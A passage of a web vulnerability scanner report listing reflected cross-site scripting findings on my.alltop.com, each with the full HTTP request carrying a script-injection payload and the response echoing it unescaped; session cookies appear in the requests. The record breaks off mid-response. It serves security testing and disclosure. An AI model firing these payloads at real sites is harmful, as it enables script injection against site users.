Issue detail

The value of the '"--></style></script><script>netsparker(0x00020C)</script> request parameter is copied into the HTML document as plain text between tags. The payload c8abe<script>alert(1)</script>1964ca13435 was submitted in the '"--></style></script><script>netsparker(0x00020C)</script> parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y?'"--></style></script><script>netsparker(0x00020C)</script>c8abe<script>alert(1)</script>1964ca13435 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:09 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:09 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:14 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:14 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
</script>c8abe<script>alert(1)</script>1964ca13435" method="post" accept-charset="utf-8">
...[SNIP]...

1.244. http://my.alltop.com/alpha/y [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82d13"><script>alert(1)</script>c3b10be6e77 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y82d13"><script>alert(1)</script>c3b10be6e77 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:07 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:07 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y82d13"><script>alert(1)</script>c3b10be6e77" method="post" accept-charset="utf-8">
...[SNIP]...

1.245. http://my.alltop.com/alpha/y [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa6f1"><script>alert(1)</script>bd961c23b69 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y?aa6f1"><script>alert(1)</script>bd961c23b69=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:49:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:49:06 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:49:06 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540; expires=Mon, 06-Jun-2011 20:49:06 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y?aa6f1"><script>alert(1)</script>bd961c23b69=1" method="post" accept-charset="utf-8">
...[SNIP]...

1.246. http://my.alltop.com/alpha/y [nsextt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y

Issue detail

The value of the nsextt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dd4b"><script>alert(1)</script>3c401fb3751 was submitted in the nsextt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AA)%3C/script%3E7dd4b"><script>alert(1)</script>3c401fb3751 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:43 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:45 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:45 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24778

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001AA)%3C/script%3E7dd4b"><script>alert(1)</script>3c401fb3751" method="post" accept-charset="utf-8">
...[SNIP]...

1.247. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e2af"><script>alert(1)</script>ff5fd060af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C9e2af"><script>alert(1)</script>ff5fd060af/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:15 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:16 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:16 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24742

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C9e2af"><script>alert(1)</script>ff5fd060af/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.248. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71196"><script>alert(1)</script>5b5787c45e5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C/style%3E%3C71196"><script>alert(1)</script>5b5787c45e5/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:17 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:17 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:17 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:17 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C/style%3E%3C71196"><script>alert(1)</script>5b5787c45e5/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.249. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a055"><script>alert(1)</script>65d8d772fe3 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C7a055"><script>alert(1)</script>65d8d772fe3/script%3E HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:18 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:18 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:18 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C7a055"><script>alert(1)</script>65d8d772fe3/script%3E" method="post" accept-charset="utf-8">
...[SNIP]...

1.250. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 275a4"><script>alert(1)</script>83baa9f1260 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E275a4"><script>alert(1)</script>83baa9f1260 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:19 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:19 GMT; path=/; domain=.alltop.com
Set-Cookie: myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:51:19 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Set-Cookie: alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:51:19 GMT; path=/; domain=.alltop.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<h
...[SNIP]...
<form action="/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E275a4"><script>alert(1)</script>83baa9f1260" method="post" accept-charset="utf-8">
...[SNIP]...

1.251. http://my.alltop.com/alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://my.alltop.com
Path:   /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7343d"><script>alert(1)</script>9e1094090ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /alpha/y'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FF)%3C/script%3E?7343d"><script>alert(1)</script>9e1094090ef=1 HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:51:14 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:51:14 GMT; path=/; domain=.alltop.com
